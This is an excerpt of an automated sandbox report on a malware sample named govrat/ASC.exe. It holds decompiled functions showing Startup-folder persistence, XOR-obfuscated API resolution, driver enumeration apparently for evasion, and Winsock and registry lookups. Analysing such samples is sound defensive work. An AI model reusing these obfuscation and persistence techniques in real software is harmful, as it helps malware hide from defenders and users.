
RegQueryValueExW.ADVAPI32(?,00000002,?,?,?,?), ref: 00960B42
RegQueryValueExW.ADVAPI32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00960B64

Strings

C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe, xrefs: 00960B11

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00952309, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17library

APIs

GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,mscoree.dll,?,00952341,00951398,?,009511C4,000000FF,0000001E,00000001,00000000,00000000,?,00958F9F), ref: 00952323

Strings

CorExitProcess, xrefs: 0095231D
mscoree.dll, xrefs: 0095230E

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Analysis Process: ASC.exe PID: 3812 Parent PID: 1212

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.8%
Total number of Nodes:	325
Total number of Limit Nodes:	25

Executed Functions

Function 012D0762, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 101
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E012D0762(char __ebx, void* __ecx, void* __edx, void* __edi) {
				void* _t51;
				void* _t56;
				void* _t59;
				struct HINSTANCE__* _t61;
				void* _t63;
				void* _t64;
				void* _t65;
				struct HINSTANCE__* _t67;
				_Unknown_base(*)()* _t68;
				void* _t71;
				CHAR* _t78;
				intOrPtr* _t82;
				intOrPtr* _t84;
				CHAR* _t85;
				void* _t88;

				 *((intOrPtr*)(_t88 - 5)) = 0x65391617;
				 *((intOrPtr*)(_t88 - 9)) = 0x130c17;
				 *((intOrPtr*)(_t88 - 0xd)) = 0x1395756;
				 *((intOrPtr*)(_t88 - 0x11)) = 0x8001116;
				 *((short*)(_t88 - 0x13)) = 0x1c16;
				 *((char*)(_t88 - 0x14)) = 0x39;
				 *((char*)(_t88 - 1)) = __ebx;
				_t51 = 0;
				do {
					 *(_t88 + _t51 - 0x14) =  *(_t88 + _t51 - 0x14) ^ 0x00000065;
					_t51 = _t51 + 1;
				} while (_t51 < 0x13);
				_pop(_t84);
				E0132FF8A(_t51, __ebx, __ecx, __edi, _t84);
				 *((char*)(_t88 - 1)) = 1;
				 *_t84(_t88 - 0x130, _t88 - 0x14);
				 *((intOrPtr*)(_t88 - 0x1b)) = 0x66151f15;
				 *((intOrPtr*)(_t88 - 0x1f)) = 0x48000d05;
				 *((short*)(_t88 - 0x21)) = 0x1007;
				 *((char*)(_t88 - 0x17)) = __ebx;
				_t56 = 0;
				do {
					 *(_t88 + _t56 - 0x21) =  *(_t88 + _t56 - 0x21) ^ 0x00000066;
					_t56 = _t56 + 1;
				} while (_t56 < 0xa);
				 *((char*)(_t88 - 0x17)) = 1;
				_t59 =  *_t84(_t88 - 0x130, _t88 - 0x21);
				_pop(_t82);
				E012EF5E8(_t59, __ebx, __edx, _t82);
				_t85 = "kernel32";
				_t61 =  *_t82(_t85);
				if(_t61 == __ebx) {
					_push(_t85);
					return E0135886A(_t61, _t82);
				}
				GetProcAddress(_t61, "FindFirstFileA"); // executed
				_t78 = _t88 - 0x130;
				_t63 = FindFirstFileA(_t78, _t88 - 0x270); // executed
				 *(_t88 - 0x28) = _t63;
				if(_t63 != 0xffffffff) {
					 *((intOrPtr*)(_t88 - 5)) = 0x7510061a;
					 *((intOrPtr*)(_t88 - 9)) = 0x1936111b;
					 *(_t88 - 0xb) = 0x1c33;
					 *((char*)(_t88 - 1)) = __ebx;
					_t64 = 0;
					do {
						 *(_t88 + _t64 - 0xb) =  *(_t88 + _t64 - 0xb) ^ 0x00000075;
						_t64 = _t64 + 1;
					} while (_t64 < 0xa);
					 *((char*)(_t88 - 1)) = 1;
					 *((intOrPtr*)(_t88 - 0x1b)) = 0x75474619;
					 *((intOrPtr*)(_t88 - 0x1f)) = 0x101b0710;
					 *((char*)(_t88 - 0x20)) = 0x1e;
					 *((char*)(_t88 - 0x17)) = __ebx;
					_t65 = 0;
					do {
						 *(_t88 + _t65 - 0x20) =  *(_t88 + _t65 - 0x20) ^ 0x00000075;
						_t65 = _t65 + 1;
					} while (_t65 < 9);
					 *((char*)(_t88 - 0x17)) = 1;
					_t67 =  *_t82(_t88 - 0x20);
					if(_t67 == __ebx) {
						_push(_t88 - 0x20);
						_push(_t78);
						_t67 = E0131502A(_t88 - 0x20, _t82);
					}
					_t68 = GetProcAddress(_t67, _t88 - 0xb);
					 *_t68( *(_t88 - 0x28));
					_t71 = 1;
				} else {
					_t71 = 0;
				}
				return _t71;
			}

0x012d0762
0x012d0769
0x012d0770
0x012d0777
0x012d077e
0x012d0784
0x012d0788
0x012d078b
0x012d078d
0x012d078d
0x012d0792
0x012d0793
0x012d0798
0x012d0799
0x012d07a9
0x012d07ad
0x012d07af
0x012d07b6
0x012d07bd
0x012d07c3
0x012d07c6
0x012d07c8
0x012d07c8
0x012d07cd
0x012d07ce
0x012d07de
0x012d07e2
0x012d07e4
0x012d07e5
0x012d07ea
0x012d07f0
0x012d07f4
0x012d07f6
0x00000000
0x012d07f7
0x012d0809
0x012d0812
0x012d0819
0x012d081b
0x012d0821
0x012d0827
0x012d082e
0x012d0835
0x012d083b
0x012d083e
0x012d0840
0x012d0840
0x012d0845
0x012d0846
0x012d084b
0x012d084f
0x012d0856
0x012d085d
0x012d0861
0x012d0864
0x012d0866
0x012d0866
0x012d086b
0x012d086c
0x012d0875
0x012d0879
0x012d087d
0x012d0882
0x012d0883
0x012d0884
0x012d0884
0x012d088e
0x012d0893
0x012d0897
0x012d0823
0x012d0823
0x012d0823
0x012d089c

APIs

GetProcAddress.KERNEL32(00000000,FindFirstFileA), ref: 012D0809
FindFirstFileA.KERNELBASE(?,?), ref: 012D0819
GetProcAddress.KERNEL32(00000000,00000075), ref: 012D088E

Strings

FindFirstFileA, xrefs: 012D0803
kernel32, xrefs: 012D07EA, 012D07EF, 012D07F6
e, xrefs: 012D078D
f, xrefs: 012D07C8
u, xrefs: 012D0866
u, xrefs: 012D0840

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012CFE2E, Relevance: 9.1, APIs: 6, Instructions: 99
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E012CFE2E(struct HINSTANCE__* __eax, signed int __ebx) {
				void* _t45;
				_Unknown_base(*)()* _t47;
				void* _t48;
				_Unknown_base(*)()* _t50;
				void* _t51;
				void* _t62;
				signed int _t65;
				void* _t67;
				void* _t71;
				struct HINSTANCE__* _t72;
				void* _t74;
				void* _t79;

				_t65 = __ebx;
				_t72 = __eax;
				 *((intOrPtr*)(_t79 - 0x11)) = 0xf2818097;
				 *((intOrPtr*)(_t79 - 0x15)) = 0x849b80b6;
				 *((intOrPtr*)(_t79 - 0x19)) = 0x97919b84;
				 *((intOrPtr*)(_t79 - 0x1d)) = 0x97b69f87;
				 *(_t79 - 0x1f) = 0x9cb7;
				 *((char*)(_t79 - 0xd)) = __ebx;
				_t45 = 0;
				do {
					 *(_t79 + _t45 - 0x1f) =  *(_t79 + _t45 - 0x1f) ^ 0x000000f2;
					_t45 = _t45 + 1;
				} while (_t45 < 0x12);
				 *((char*)(_t79 - 0xd)) = 1;
				_t47 = GetProcAddress(__eax, _t79 - 0x1f); // executed
				 *(_t79 - 0x40) = _t47;
				 *((intOrPtr*)(_t79 - 0x24)) = 0xf3a4969e;
				 *((intOrPtr*)(_t79 - 0x28)) = 0x92bd9680;
				 *((intOrPtr*)(_t79 - 0x2c)) = 0x92b18196;
				 *((intOrPtr*)(_t79 - 0x30)) = 0x859a81b7;
				 *((intOrPtr*)(_t79 - 0x34)) = 0x96909a85;
				 *((intOrPtr*)(_t79 - 0x38)) = 0x96b78796;
				 *(_t79 - 0x39) = 0xb4;
				 *((char*)(_t79 - 0x20)) = __ebx;
				_t48 = 0;
				do {
					 *(_t79 + _t48 - 0x39) =  *(_t79 + _t48 - 0x39) ^ 0x000000f3;
					_t48 = _t48 + 1;
				} while (_t48 < 0x19);
				 *((char*)(_t79 - 0x20)) = 1;
				_t50 = GetProcAddress(_t72, _t79 - 0x39); // executed
				 *(_t79 - 8) = _t50;
				if( *(_t79 - 0x40) == __ebx || _t50 == __ebx) {
					L14:
					_t51 = 0;
				} else {
					 *(_t79 - 0x40)(_t79 - 0x44, 4, _t79 - 0xc);
					_t77 =  *(_t79 - 0xc);
					_t88 =  *(_t79 - 0xc) - __ebx;
					if( *(_t79 - 0xc) == __ebx) {
						goto L14;
					} else {
						_t74 = E012CC795(_t71, _t77, _t88);
						if(_t74 == __ebx) {
							goto L14;
						} else {
							_push(_t79 - 0x44);
							_push( *(_t79 - 0xc));
							_push(_t74); // executed
							if( *(_t79 - 0x40)() == 0) {
								L13:
								E012C115B(_t67, _t71, _t77, _t74);
								goto L14;
							} else {
								_t77 =  *(_t79 - 0xc) >> 2;
								if(_t77 > __ebx) {
									do {
										_push(0x400);
										_push(_t79 - 0x844);
										_push( *((intOrPtr*)(_t74 + _t65 * 4)));
										if( *(_t79 - 8)() == 0) {
											goto L12;
										} else {
											_t62 = E012C1C05(_t79 - 0x844,  *((intOrPtr*)(_t79 + 8)));
											_pop(_t67);
											if(_t62 == 0) {
												E012C115B(_t67, _t71, _t77, _t74);
												_t51 = 1;
											} else {
												goto L12;
											}
										}
										goto L15;
										L12:
										_t65 = _t65 + 1;
									} while (_t65 < _t77);
								}
								goto L13;
							}
						}
					}
				}
				L15:
				return _t51;
			}

0x012cfe2e
0x012cfe2e
0x012cfe30
0x012cfe37
0x012cfe3e
0x012cfe45
0x012cfe4c
0x012cfe52
0x012cfe55
0x012cfe57
0x012cfe57
0x012cfe5c
0x012cfe5d
0x012cfe6d
0x012cfe71
0x012cfe73
0x012cfe76
0x012cfe7d
0x012cfe84
0x012cfe8b
0x012cfe92
0x012cfe99
0x012cfea0
0x012cfea4
0x012cfea7
0x012cfea9
0x012cfea9
0x012cfeae
0x012cfeaf
0x012cfeb9
0x012cfebd
0x012cfebf
0x012cfec5
0x012cff3a
0x012cff3a
0x012cfecb
0x012cfed5
0x012cfed8
0x012cfedb
0x012cfedd
0x00000000
0x012cfedf
0x012cfee4
0x012cfee8
0x00000000
0x012cfeea
0x012cfeed
0x012cfeee
0x012cfef1
0x012cfef7
0x012cff33
0x012cff34
0x00000000
0x012cfef9
0x012cfefc
0x012cff01
0x012cff03
0x012cff03
0x012cff0e
0x012cff0f
0x012cff17
0x00000000
0x012cff19
0x012cff23
0x012cff29
0x012cff2c
0x012cff42
0x012cff4a
0x00000000
0x00000000
0x00000000
0x012cff2c
0x00000000
0x012cff2e
0x012cff2e
0x012cff2f
0x012cff03
0x00000000
0x012cff01
0x012cfef7
0x012cfee8
0x012cfedd
0x012cff3c
0x012cff40

APIs

GetProcAddress.KERNEL32(?,000000F2), ref: 012CFE71
GetProcAddress.KERNEL32(?,000000F3), ref: 012CFEBD
K32EnumDeviceDrivers.KERNEL32(?,00000004,?,?,000000F3), ref: 012CFED5
K32EnumDeviceDrivers.KERNEL32(00000000,?,?,?,000000F3), ref: 012CFEF2
K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400,?,000000F3), ref: 012CFF12
__wcsicoll.LIBCMT ref: 012CFF23

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D5F07, Relevance: 42.1, APIs: 6, Strings: 18, Instructions: 74
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012D5F07(struct HINSTANCE__* __eax, _Unknown_base(*)()** __edi) {
				void* _t42;
				_Unknown_base(*)()* _t43;
				_Unknown_base(*)()* _t45;
				_Unknown_base(*)()* _t47;
				_Unknown_base(*)()* _t49;
				_Unknown_base(*)()* _t51;
				_Unknown_base(*)()* _t53;
				void* _t62;

				 *(_t62 - 4) = __eax;
				if(__eax == 0) {
					L7:
					_t42 = 0;
				} else {
					 *(_t62 - 0x30) = 0x53415357;
					 *((intOrPtr*)(_t62 - 0x2c)) = 0x74726174;
					 *((short*)(_t62 - 0x28)) = 0x7075;
					 *((char*)(_t62 - 0x26)) = 0;
					_t43 = GetProcAddress(__eax, _t62 - 0x30); // executed
					 *__edi = _t43;
					 *(_t62 - 0x3c) = 0x43415357;
					 *((intOrPtr*)(_t62 - 0x38)) = 0x6e61656c;
					 *((short*)(_t62 - 0x34)) = 0x7075;
					 *((char*)(_t62 - 0x32)) = 0;
					_t45 = GetProcAddress( *(_t62 - 4), _t62 - 0x3c); // executed
					 *(__edi + 4) = _t45;
					 *(_t62 - 0x18) = 0x74656e69;
					 *((intOrPtr*)(_t62 - 0x14)) = 0x6464615f;
					 *((short*)(_t62 - 0x10)) = 0x72;
					_t47 = GetProcAddress( *(_t62 - 4), _t62 - 0x18); // executed
					 *(__edi + 8) = _t47;
					 *(_t62 - 0x4c) = 0x68746567;
					 *((intOrPtr*)(_t62 - 0x48)) = 0x6274736f;
					 *((intOrPtr*)(_t62 - 0x44)) = 0x6d616e79;
					 *((short*)(_t62 - 0x40)) = 0x65;
					_t49 = GetProcAddress( *(_t62 - 4), _t62 - 0x4c); // executed
					 *(__edi + 0xc) = _t49;
					 *(_t62 - 0x24) = 0x74656e69;
					 *((intOrPtr*)(_t62 - 0x20)) = 0x6f746e5f;
					 *((short*)(_t62 - 0x1c)) = 0x61;
					_t51 = GetProcAddress( *(_t62 - 4), _t62 - 0x24); // executed
					 *(__edi + 0x10) = _t51;
					 *(_t62 - 0xc) = 0x686f746e;
					 *((short*)(_t62 - 8)) = 0x6c;
					_t53 = GetProcAddress( *(_t62 - 4), _t62 - 0xc); // executed
					 *(__edi + 0x14) = _t53;
					if( *__edi == 0 ||  *(__edi + 8) == 0 ||  *(__edi + 0xc) == 0 ||  *(__edi + 0x10) == 0 || _t53 == 0) {
						goto L7;
					} else {
						_t42 = 1;
					}
				}
				return _t42;
			}

0x012d5f09
0x012d5f0e
0x012d5ffb
0x012d5ffb
0x012d5f14
0x012d5f20
0x012d5f27
0x012d5f2e
0x012d5f34
0x012d5f37
0x012d5f39
0x012d5f42
0x012d5f49
0x012d5f50
0x012d5f56
0x012d5f59
0x012d5f5b
0x012d5f65
0x012d5f6c
0x012d5f73
0x012d5f79
0x012d5f7b
0x012d5f85
0x012d5f8c
0x012d5f93
0x012d5f9a
0x012d5fa0
0x012d5fa2
0x012d5fac
0x012d5fb3
0x012d5fba
0x012d5fc0
0x012d5fc2
0x012d5fcc
0x012d5fd3
0x012d5fd9
0x012d5fdb
0x012d5fe1
0x00000000
0x012d5ff6
0x012d5ff8
0x012d5ff8
0x012d5fe1
0x012d5fff

APIs

GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 012D5F37
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012D5F59
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012D5F79
GetProcAddress.KERNEL32(?,?,?,?,?,?,?), ref: 012D5FA0
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 012D5FC0
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 012D5FD9

Strings

ntoh, xrefs: 012D5FCC
tart, xrefs: 012D5F27
_add, xrefs: 012D5F6C
lean, xrefs: 012D5F49
l, xrefs: 012D5FD3
e, xrefs: 012D5F9A
r, xrefs: 012D5F73
inet, xrefs: 012D5FAC
geth, xrefs: 012D5F85
_nto, xrefs: 012D5FB3
WSAS, xrefs: 012D5F20
ynam, xrefs: 012D5F93
up, xrefs: 012D5F2E
ostb, xrefs: 012D5F8C
a, xrefs: 012D5FBA
inet, xrefs: 012D5F65
up, xrefs: 012D5F50
WSAC, xrefs: 012D5F42

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D5A5F, Relevance: 33.3, APIs: 3, Strings: 16, Instructions: 81
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E012D5A5F(_Unknown_base(*)()** __esi) {
				struct HINSTANCE__* _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v46;
				short _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				short _t36;
				short _t37;
				short _t38;
				short _t39;
				short _t40;
				short _t41;
				struct HINSTANCE__* _t44;
				_Unknown_base(*)()* _t46;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t50;

				_t36 = 0x53;
				_v24 = _t36;
				_t37 = 0x48;
				_v22 = _t37;
				_t38 = 0x45;
				_v20 = _t38;
				_t39 = 0x4c;
				_v18 = _t39;
				_v16 = _t39;
				_t40 = 0x33;
				_v14 = _t40;
				_t41 = 0x32;
				_v12 = _t41;
				_v10 = 0;
				_push( &_v24);
				_t44 = E0132FBD9( &_v24);
				_v8 = _t44;
				if(_t44 == 0) {
					L5:
					return 0;
				}
				_push(_t55);
				_v44 = 0x72434853;
				_v40 = 0x65746165;
				_v36 = 0x6c656853;
				_v32 = 0x6574496c;
				_v28 = 0x6d;
				_t46 = GetProcAddress(_t44,  &_v44); // executed
				 *__esi = _t46;
				_v64 = 0x61504853;
				_v60 = 0x44657372;
				_v56 = 0x6c707369;
				_v52 = 0x614e7961;
				_v48 = 0x656d;
				_v46 = 0;
				_t48 = GetProcAddress(_v8,  &_v64); // executed
				 *(__esi + 4) = _t48;
				_v88 = 0x65474853;
				_v84 = 0x65705374;
				_v80 = 0x6c616963;
				_v76 = 0x646c6f46;
				_v72 = 0x61507265;
				_v68 = 0x576874;
				_t50 = GetProcAddress(_v8,  &_v88); // executed
				 *(__esi + 8) = _t50;
				if( *__esi == 0 ||  *(__esi + 4) == 0 || _t50 == 0) {
					goto L5;
				} else {
					return 1;
				}
			}

0x012d5a68
0x012d5a6b
0x012d5a6f
0x012d5a72
0x012d5a76
0x012d5a79
0x012d5a7d
0x012d5a80
0x012d5a84
0x012d5a88
0x012d5a89
0x012d5a8f
0x012d5a90
0x012d5a96
0x012d5a9d
0x012d5a9f
0x012d5aa6
0x012d5aab
0x012d5b5d
0x00000000
0x012d5b5d
0x012d5ab1
0x012d5abd
0x012d5ac4
0x012d5acb
0x012d5ad2
0x012d5ad9
0x012d5adf
0x012d5ae1
0x012d5aea
0x012d5af1
0x012d5af8
0x012d5aff
0x012d5b06
0x012d5b0c
0x012d5b0f
0x012d5b11
0x012d5b1b
0x012d5b22
0x012d5b29
0x012d5b30
0x012d5b37
0x012d5b3e
0x012d5b45
0x012d5b47
0x012d5b4d
0x00000000
0x012d5b58
0x00000000
0x012d5b5a

APIs

GetProcAddress.KERNEL32(00000000,?,?,?,?,00000000), ref: 012D5ADF
GetProcAddress.KERNEL32(012D136C,?), ref: 012D5B0F
GetProcAddress.KERNEL32(012D136C,?), ref: 012D5B45

Strings

cial, xrefs: 012D5B29
SHCr, xrefs: 012D5ABD
SHPa, xrefs: 012D5AEA
m, xrefs: 012D5AD9
tSpe, xrefs: 012D5B22
Shel, xrefs: 012D5ACB
lIte, xrefs: 012D5AD2
thW, xrefs: 012D5B3E
rseD, xrefs: 012D5AF1
eate, xrefs: 012D5AC4
me, xrefs: 012D5B06
SHGe, xrefs: 012D5B1B
erPa, xrefs: 012D5B37
ispl, xrefs: 012D5AF8
ayNa, xrefs: 012D5AFF
Fold, xrefs: 012D5B30

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C355D, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 42
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012C355D(struct HINSTANCE__* __eax, void* __ebx, void* __ecx, void* __esi) {
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t3;
				_Unknown_base(*)()* _t4;
				void* _t11;
				struct HINSTANCE__* _t12;
				_Unknown_base(*)()* _t16;

				_t11 = __ecx;
				_t12 = __eax;
				if(__eax != 0) {
					_t2 = GetProcAddress(__eax, "FlsAlloc"); // executed
					 *0x12e38d4 = _t2; // executed
					_t3 = GetProcAddress(_t12, "FlsGetValue"); // executed
					 *0x12e38d8 = _t3; // executed
					_t4 = GetProcAddress(_t12, "FlsSetValue"); // executed
					 *0x12e38dc = _t4; // executed
					_t5 = GetProcAddress(_t12, "FlsFree"); // executed
					_t16 =  *0x12dc194;
					 *0x12e38e0 = _t5;
					if( *0x12e38d4 == 0 ||  *0x12e38d8 == 0 ||  *0x12e38dc == 0 || _t5 == 0) {
						 *0x12e38d8 =  *0x12dc198;
						_t5 =  *0x12dc190;
						 *0x12e38d4 = E012C325F;
						 *0x12e38dc = _t16;
						 *0x12e38e0 =  *0x12dc190;
					}
					return E01371E19(_t5, _t11);
				}
				E012C329C(__ebx);
				return 0;
			}

0x012c355d
0x012c355d
0x012c3561
0x012c3579
0x012c3581
0x012c3586
0x012c358e
0x012c3593
0x012c359b
0x012c35a0
0x012c35a9
0x012c35af
0x012c35b4
0x012c35d1
0x012c35d6
0x012c35db
0x012c35e5
0x012c35eb
0x012c35eb
0x00000000
0x012c35f0
0x012c3563
0x012c356b

APIs

GetProcAddress.KERNEL32(?,FlsAlloc), ref: 012C3579
GetProcAddress.KERNEL32(?,FlsGetValue,?,FlsAlloc), ref: 012C3586
GetProcAddress.KERNEL32(?,FlsSetValue,?,FlsGetValue,?,FlsAlloc), ref: 012C3593
GetProcAddress.KERNEL32(?,FlsFree,?,FlsSetValue,?,FlsGetValue,?,FlsAlloc), ref: 012C35A0

Part of subcall function 012C329C: TlsFree.KERNEL32(00000016), ref: 012C32C7

Strings

FlsSetValue, xrefs: 012C3588
FlsGetValue, xrefs: 012C357B
FlsFree, xrefs: 012C3595
FlsAlloc, xrefs: 012C3573

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012CD775, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 327
registry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E012CD775(void* __eax, void* __ebx, void* __edi, void* __esi) {
				void* _t118;
				void* _t119;
				void* _t121;

				_t119 = __edi;
				_t118 = __ebx;
				_t113 = __eax;
				if(__eax == 0) {
					__eax = 0x50;
					 *(__ebp - 0x98) = __ax;
					__eax = 0x61;
					 *(__ebp - 0x96) = __ax;
					__eax = 0x72;
					 *(__ebp - 0x94) = __ax;
					__eax = 0x65;
					 *(__ebp - 0x92) = __ax;
					__eax = 0x6e;
					 *(__ebp - 0x90) = __ax;
					__eax = 0x74;
					 *(__ebp - 0x8e) = __ax;
					__eax = 0x4b;
					 *(__ebp - 0x8c) = __ax;
					__eax = 0x65;
					 *(__ebp - 0x8a) = __ax;
					__eax = 0x79;
					 *(__ebp - 0x88) = __ax;
					__eax = 0x4e;
					 *(__ebp - 0x86) = __ax;
					__eax = 0x61;
					 *(__ebp - 0x84) = __ax;
					__eax = 0x6d;
					 *(__ebp - 0x82) = __ax;
					__eax = 0x65;
					 *(__ebp - 0x80) = __ax;
					__eax = 0;
					 *(__ebp - 0x7e) = __ax;
					__eax = __ebp - 0x98;
					__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0x98, __ebx, __ebx, __ebx, __ebx); // executed
					if(__eax == 0) {
						goto L1;
					}
					__eax = 0x53;
					 *(__ebp - 0xd8) = __ax;
					__eax = 0x79;
					 *(__ebp - 0xd6) = __ax;
					__eax = 0x73;
					 *(__ebp - 0xd4) = __ax;
					__eax = 0x74;
					 *(__ebp - 0xd2) = __ax;
					__eax = 0x65;
					 *(__ebp - 0xd0) = __ax;
					__eax = 0x6d;
					 *(__ebp - 0xce) = __ax;
					__eax = 0x43;
					 *(__ebp - 0xcc) = __ax;
					__eax = 0x6f;
					 *(__ebp - 0xca) = __ax;
					__eax = 0x6d;
					 *(__ebp - 0xc8) = __ax;
					__eax = 0x70;
					 *(__ebp - 0xc6) = __ax;
					__eax = 0x6f;
					 *(__ebp - 0xc4) = __ax;
					__eax = 0x6e;
					 *(__ebp - 0xc2) = __ax;
					__eax = 0x65;
					 *(__ebp - 0xc0) = __ax;
					__eax = 0x6e;
					 *(__ebp - 0xbe) = __ax;
					__eax = 0x74;
					 *(__ebp - 0xbc) = __ax;
					__eax = 0;
					 *(__ebp - 0xba) = __ax;
					__ebp - 0xc = __ebp - 0x148;
					__eax = __ebp - 0xd8;
					 *(__ebp - 0xc) = 4;
					__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0xd8, __ebx, __ebx, __ebp - 0x148, __ebp - 0xc); // executed
					if(__eax != 0 ||  *(__ebp - 0x148) != 1) {
						__eax = 0x44;
						 *(__ebp - 0x7c) = __ax;
						__eax = 0x69;
						 *(__ebp - 0x7a) = __ax;
						__eax = 0x73;
						 *(__ebp - 0x78) = __ax;
						__eax = 0x70;
						 *(__ebp - 0x76) = __ax;
						__eax = 0x6c;
						 *(__ebp - 0x74) = __ax;
						__eax = 0x61;
						 *(__ebp - 0x72) = __ax;
						__eax = 0x79;
						 *(__ebp - 0x70) = __ax;
						__eax = 0x4e;
						 *(__ebp - 0x6e) = __ax;
						__eax = 0x61;
						 *(__ebp - 0x6c) = __ax;
						__eax = 0x6d;
						 *(__ebp - 0x6a) = __ax;
						__eax = 0x65;
						 *(__ebp - 0x68) = __ax;
						__eax = 0;
						 *(__ebp - 0x66) = __ax;
						__ebp - 0xc = __ebp - 0x24c;
						__eax = __ebp - 0x7c;
						 *(__ebp - 0xc) = __edi;
						__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0x7c, __ebx, __ebx, __ebp - 0x24c, __ebp - 0xc); // executed
						if(__eax != 0) {
							goto L1;
						}
						__ebp - 0x24c = __ebp - 0x44c;
						__eax = E012C1667(__ebp - 0x44c, __edi, __ebp - 0x24c, 0xffffffff);
						__eax = 0x44;
						 *(__ebp - 0xb8) = __ax;
						__eax = 0x69;
						 *(__ebp - 0xb6) = __ax;
						__eax = 0x73;
						 *(__ebp - 0xb4) = __ax;
						__eax = 0x70;
						 *(__ebp - 0xb2) = __ax;
